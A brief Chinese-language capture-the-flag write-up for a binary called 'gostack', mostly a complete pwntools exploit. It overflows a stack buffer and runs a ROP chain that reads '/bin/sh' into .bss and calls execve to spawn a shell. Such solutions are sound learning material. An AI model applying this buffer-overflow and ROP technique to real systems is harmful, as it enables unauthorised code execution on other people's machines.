查看保护
ida比较复杂,建议动调配合静态分析程序运行
这里函数返回不用leave和ret,而是利用add rsp和ret,所以要动调查看到底要覆盖哪里。
完整exp:
from pwn import*
p=process('./gostack')
syscall=0x4616c9
pop_rax=0x40f984
pop_rdi_r14_r13_r12_rbp_rbx=0x4a18a5
pop_rsi=0x42138a
pop_rdx=0x4944ec
bss=0x5633A0
ret=0x40201a
payload=b'\x00'*0x1d0
payload+=p64(pop_rdi_r14_r13_r12_rbp_rbx)+p64(0)+p64(0)*5+p64(pop_rsi)+p64(bss)+p64(pop_rdx)+p64(0x100)+p64(pop_rax)+p64(0)+p64(syscall)
payload+=p64(pop_rdi_r14_r13_r12_rbp_rbx)+p64(bss)+p64(0)*5+p64(pop_rsi)+p64(0)+p64(pop_rdx)+p64(0)+p64(pop_rax)+p64(59)+p64(syscall)
p.sendlineafter(b'Input your magic message :',payload)
p.send(b'/bin/sh\x00')
p.interactive()
